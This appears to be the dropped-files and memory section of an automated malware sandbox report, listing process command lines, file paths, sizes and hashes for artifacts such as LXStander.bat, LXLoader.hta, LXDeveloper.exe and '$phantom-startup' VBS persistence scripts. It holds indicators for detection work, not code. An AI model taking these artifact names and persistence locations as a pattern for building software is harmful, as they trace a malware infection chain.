C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
288B
MD58ed04759f080c9fa902e560fdb535bb0
SHA146ada87c6442dd625092f7bec6941d5acbe82581
SHA256a00277c4fd206b0aaa0ef3656c48a2a3fdf099fa78b3652707524f24e88c2a15
SHA512e4c744f965202aafe82fde09a6a17e24cfef76497d4658b336f80735dbf27c6db9f62be517db1b0f9f16070c712505507d8d16ee58a41426422c19caafe5beee
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent StateFilesize
1KB
MD5da55106a71c4b083048f181c9020e405
SHA19cc4ee8c95e9bd9fe13bdf22306af2d669241ecf
SHA25613e94ee00fba14366e57a9cf092436d51bf9a250a6b2c0b7c796ce69c23892c1
SHA51223396668959ccb06d78381b546392f4348ace1f0151437a38dae62171fd9dc4c424673b47b0bd7b2af1bed08193dcdd50a15f32938cc26883d31750f739763d7
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending ReportsFilesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurityFilesize
690B
MD504f7e782442b06d3680da16e97f3fa07
SHA17a06f080fe1b881cbd3a7da1341073e2d899d621
SHA256b6459fa73caf6bafa2085a0401803992e3038b4a168cf5f726984b84487e1a63
SHA51288f12418cebf4c3f267e8d8586a6ac663ab04bab737999543424f3d1b5c80188381edb9f2333f03d113e1994c8d0d469f00862a3eb17fcd20ddd8c5cef2cc7fa
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD542bb0eb4a16960282a79553be895c68f
SHA15bf6c149ec9e64733e4e6686f58ee4d0473b62cc
SHA2564e536b70c03386c4a95bb7151a7b631cf41f870c28c35a6822b9012d6f548b70
SHA512e549e575f7bba5230ebabbbc50bd38fa7d24b777c6d026d2f90152bde54a78b9d9addb5c899e740a837b5a08f3d67eab70582974af5187ebeb54a1dad0af0a9d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\PreferencesFilesize
7KB
MD5ec172be6c07925fa5a4b6f287977e25d
SHA1d9ab919b21250e5e64e823ecabcabe48a50a66b5
SHA25635364a0fd813174c528a4769d675f6ba2f57d2ee156a3014afe43f2efd0807d2
SHA5125c5618188f661f5812b63aed9dbedabb8eb0a9831b2dd59c6f301d01cc08937b6c082eb33d62ce69a6515ddf0491c4c00ce045cbaed4d074770e416712520e6d
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local StateFilesize
129KB
MD5e1518d5821ef06df650556c5508e37c1
SHA1210eae8966b7c2b62abb2a33159667bcc9828aca
SHA256d2338bda8362a2e427cc36abb115f31bf1a82e964088c4549f87b26b439ad603
SHA512a9b21bb6800281538d04f4c6acb6d5f473fbcef0ad7473f5f2644f0f9ca83099ba3b1f33232830cc72848a1815482b596a5d27d6cb4b4568d03f898fa2587066
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\LX.exe.logFilesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheFilesize
62KB
MD5e566632d8956997225be604d026c9b39
SHA194a9aade75fffc63ed71404b630eca41d3ce130e
SHA256b7f66a3543488b08d8533f290eb5f2df7289531934e6db9c346714cfbf609cf0
SHA512f244eb419eef0617cd585002e52c26120e57fcbadc37762c100712c55ff3c29b0f3991c2ffa8eefc4080d2a8dbfa01b188250ea440d631efed358e702cc3fecd
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD53ec0d76d886b2f4b9f1e3da7ce9e2cd7
SHA168a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea
SHA256214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5
SHA512a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD5e279c9445174a3046b4d9e8f39331639
SHA172761c8cb039906f2fd74278fbd5d8b562394a1e
SHA256b177c06d921e7ea6f3ba8bd5cf950389c0a45bca6df07d1299bd50acd4f5464c
SHA512fe7029cd4e7b14a9961141dfa7cb911b0773bff74b9b2058a104106011984e31630141c06e749c9f796a41666ea1f53b5f85c32b473219a9eefd4865df2a6a40
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
1KB
MD5308190dd412ece93c5698e1834f069d1
SHA19c956d25b7cf452eb03e34fff5904802361baf57
SHA256c789cd9e77968272ecb0dcaa89c26ff66f03a57387d38e12cc0d5956fb7af033
SHA512e62ca8cbf5434f461a8768e8daca18be3e3b4ad0b00ca3d63cc5ec9b41bf3d128039eced07f710324fae650d16102733bc35d2a16a4888fc04ee00fe7978fb11
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD520573d05fc1acef706ffbdd4dc9f45dc
SHA1defd35463b3433657ebb00de76d5f0cd0b81c81b
SHA2560a2b951533b29655270b941077bbf34ba21a5a59aebaf9948130ff31c7adf808
SHA5128eca0f79e84f4018dd01d5c24b3f7e3b62a8ed7b186e1d918d4452e8f0c7a66b5e92efb74b76d22339a8bad7818147ee486582b384ca99db31e44e3219daf7b7
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD52e8eb51096d6f6781456fef7df731d97
SHA1ec2aaf851a618fb43c3d040a13a71997c25bda43
SHA25696bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864
SHA5120a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD53c0fe86517be16d2b0a671148c0274d2
SHA1bd7a487a037395e9ede9e76b4a455fdf386ba8db
SHA2565f85aaa0472b8ae98352b7295cd59357e3e585b2299c540e9a8b5848a8d6b302
SHA512642bc58c0a5682b45056e837be0dc5d1cd8c400f0e73f20d17c19720fb1fdae132b86873100955e9d65f72f1d481704b84c30d440ca53898c6d6d6f106b74f0a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD58b1394bd98c93d68bb4151a8c8c4015b
SHA13c5695c58a2186c1a13e70d8de9343f660429a91
SHA2563d46aa2ace9880ec7c1eb00581078beb3ca2107f343654aa5d5e250c97bf67d8
SHA512b7fe198d72b322dd2b2badf038821af9ceccae8b506f7475d8c253ea40aef9b0ba50dae223d5251d72a14aec81d025d394d3277576125d03f3e4ec393459a607
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5620b67563d8c316609b85865a60da6d5
SHA180e6ec8f02e3c6526d8df9d92f54b11ed04714dc
SHA25669efa1ad23035335ef51fe4efb4cda1bbb79628e7a4145dd682441925f8170fc
SHA5125aea916be82f53bc7f6d2f9ef0c33deb23b06816036fb7b3daf4ca17088b5703b7e9f26fa6a79b239d552c4c22ef3416c558080e48247bf5f3487d2fd17ece14
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a9e9f6d3cc52ae46abf011388d874c00
SHA1645d0b096c18aff4f16c689024690eb9d6867c22
SHA256f8dbd09f90ac3eec627448d5a832d2ef8e93eac138b4064958298f28aea334e8
SHA512a5cc0a7c017eb7e7593f5f2afb6633a195e18b2679b8977ef7b4b6bf9cd3f966d203be411b9ebd9353de426540067ef9e246f5880a8f70ef3179f867cd01e06d
-
C:\Users\Admin\AppData\Local\Temp\LXDeveloper.exeFilesize
227KB
MD55ea35df19a4a427188a71eaef21e18f9
SHA196576fe4d1190f4763dad5b1eadc28cf08a5f514
SHA2565011f781ee0d9e78eccbc3406df594e40b7565aa5eb07d75404c15205ebfdf57
SHA512b7ab1a9933a8d7b9e19ecf24c4b0a0ee52b44f6efc60ae564c0581ae205d8c92576478a948fe547fe2fafd9246451480988bb9c7362c260c9c36627749c0fd04
-
C:\Users\Admin\AppData\Local\Temp\LXLoader.htaFilesize
1KB
MD5634d4287e13fdacc66bc03d791c283ee
SHA19c716981f3610af98a55c891a2fa4cb471d3499f
SHA2566f8f8505a3d04ce21351d07a1f43313ac988beb1b157b04f35abbb1715787c48
SHA512cb78a2a3a39febde803c4a466e5c3526b89247da08f83118b72527d7fabacc6097745d8d650dd0ce36a532e1115ebe8fe6ec0a653e6f5712dce7995e059c5910
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3tjh1c3x.s3v.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_903.vbsFilesize
124B
MD56ef9df44f98aba19215d99a3f57cdec1
SHA10241a627b7fbfbe2e04c91170800d2685683af36
SHA256aa6a61f67f9705b9d7acb850d2356e949827e8a09ff87fbc01df9501ab1d1e4a
SHA5124471dfba999b0401e0841bd15b293999c4dbd4e02fc72a5dc9685d6b012abb4c40ac1a2feb7a99a75ccb86891f9bed65651d01cf2e08399c4d10350da8f46cb9
-
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_969.vbsFilesize
124B
MD5ee8293eb830dc2a81fa611927b3886b1
SHA167a7b86d2a4e6e68e8cd9ff466cea9a243ebd034
SHA256739ce7bfe2a84997bab1f9bbc6efb2930f2f5fca4d1e2a22dbe66f338829c6a8
SHA512d4b9be99f301920263b26085a94344abc82c8a593c31afe61de0ceeadc531965dba27f88e99d1ad5794656aecaad8e7def64ee2914124bb4e0e15cf7a8969134
-
C:\Users\Admin\Downloads\LXStander.batFilesize
611KB
MD57fc2f81cc1c38aa26c5c7b6b9ad66fec
SHA10809b3600344412c7924313bc1d95d9d22903a69
SHA2561d7494b0fc1b6c2d78b0d7e64835c749ca7204c21c8af09f7893aa7ba1f8b0ef
SHA512cea796af05da666a4eace521f82d1d8ce4cae6b61a5576f5dc8b014cd85ce4ffb13885b8bbe50e7f20828ab83bc2d99c35fc3473fa2d8e3ef762453480dfec36
-
\??\pipe\crashpad_4924_QBAGMWAAUHWMXRJBMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/540-210-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/756-170-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1176-158-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1264-214-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1376-164-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1524-211-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1548-161-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1564-162-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1728-171-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1744-167-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1820-159-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/1964-165-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/2464-212-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/3316-160-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/3316-150-0x0000000002960000-0x000000000298A000-memory.dmpFilesize
168KB
-
memory/3564-104-0x00007FFF94A90000-0x00007FFF95552000-memory.dmpFilesize
10.8MB
-
memory/3564-96-0x0000019DCAA40000-0x0000019DCAA62000-memory.dmpFilesize
136KB
-
memory/3564-87-0x00007FFF94A93000-0x00007FFF94A95000-memory.dmpFilesize
8KB
-
memory/3564-138-0x00007FFF94A90000-0x00007FFF95552000-memory.dmpFilesize
10.8MB
-
memory/3564-107-0x0000019DCAEA0000-0x0000019DCAF14000-memory.dmpFilesize
464KB
-
memory/3564-106-0x0000019DCAE20000-0x0000019DCAE28000-memory.dmpFilesize
32KB
-
memory/3564-105-0x00007FFF94A90000-0x00007FFF95552000-memory.dmpFilesize
10.8MB
-
memory/3564-103-0x0000019DCAE50000-0x0000019DCAE96000-memory.dmpFilesize
280KB
-
memory/3564-102-0x00007FFF94A90000-0x00007FFF95552000-memory.dmpFilesize
10.8MB
-
memory/3936-163-0x00007FFF77E30000-0x00007FFF77E40000-memory.dmpFilesize
64KB
-
memory/4668-213-0x00000295FB8B0000-0x00000295FB8FA000-memory.dmpFilesize
296KB
-
memory/4676-396-0x0000000002480000-0x0000000002490000-memory.dmpFilesize
64KB
-
memory/4676-410-0x0000000000BE0000-0x0000000000BF6000-memory.dmpFilesize
88KB
-
memory/4676-261-0x0000000000360000-0x000000000039E000-memory.dmpFilesize
248KB
-
memory/5920-421-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/5920-422-0x0000000005270000-0x0000000005302000-memory.dmpFilesize
584KB
-
memory/5920-423-0x0000000005310000-0x00000000053AC000-memory.dmpFilesize
624KB
-
memory/5920-424-0x0000000005960000-0x0000000005F06000-memory.dmpFilesize
5.6MB
-
memory/5944-425-0x0000019EE8700000-0x0000019EE8774000-memory.dmpFilesize
464KB